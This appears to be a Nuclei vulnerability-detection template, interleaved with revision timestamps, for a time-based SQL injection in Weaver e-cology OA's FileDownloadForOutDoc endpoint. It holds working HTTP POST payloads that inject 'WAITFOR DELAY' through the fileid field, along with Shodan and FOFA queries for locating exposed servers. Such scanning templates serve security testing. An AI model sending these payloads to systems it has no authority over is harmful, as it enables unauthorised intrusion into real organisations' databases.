2023-08-11 05:44:21 +00:00
id : ecology-oa-file-sqli
info :
2023-08-11 10:15:25 +00:00
name : E-cology FileDownloadForOutDocSQL - SQL Injection
2023-08-11 05:44:21 +00:00
author : momika233
severity : high
description : |
e-cology did not effectively filter the user input, but directly spliced it into the SQL query statement, resulting in SQL injection vulnerabilities in the system
reference :
- https://github.com/TgHook/Vulnerability-Wiki/blob/master/docs-base/docs/oa/%E6%B3%9B%E5%BE%AEOA%20e-cology%20FileDownloadForOutDoc%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata :
verified : true
2023-10-14 11:27:55 +00:00
max-request : 1
2023-08-11 05:44:21 +00:00
shodan-query : ecology_JSessionid
fofa-query : app="泛微-协同办公OA"
2023-08-11 10:15:25 +00:00
tags : ecology,ecology-oa,sqli
2023-08-11 05:44:21 +00:00
http :
- raw :
- |
2023-08-11 10:15:25 +00:00
@timeout : 15s
2023-08-11 05:44:21 +00:00
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
2023-08-11 05:46:44 +00:00
Host : {{Hostname}}
2023-08-11 05:44:21 +00:00
2023-08-11 10:15:25 +00:00
isFromOutImg=1&fileid=%d+WAITFOR+DELAY+'0:0:7'
2023-10-31 10:54:08 +00:00
- |
2023-11-03 10:53:09 +00:00
@timeout : 35s
2023-10-31 10:54:08 +00:00
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host : {{Hostname}}
isFromOutImg=1&fileid=%d+WAITFOR+DELAY+'0:0:15'
2023-08-11 05:44:21 +00:00
2023-10-31 10:54:08 +00:00
matchers-condition : and
2023-08-11 05:44:21 +00:00
matchers :
- type : dsl
dsl :
2023-11-03 10:53:09 +00:00
- 'duration_1>=7 && status_code_1 == 200'
2023-10-31 10:54:08 +00:00
- 'contains(header_1, "ecology_JSessionid=")'
2023-11-03 10:53:09 +00:00
- 'duration_2>=15 && status_code_2 == 200'
2023-10-31 10:54:08 +00:00
- 'contains(header_2, "ecology_JSessionid=")'
condition : and
2023-11-03 11:00:56 +00:00
# digest: 4a0a004730450220596edd2349df4768ede6899a51ac91ab751b3f9a1f0a6387c328ab0a4d371d91022100dfc4ae8081c42434d2872c3dcd68aa37d6bc8167d7e9619d815446d5532fc704:922c64590222798bb761d5b6d8e72950
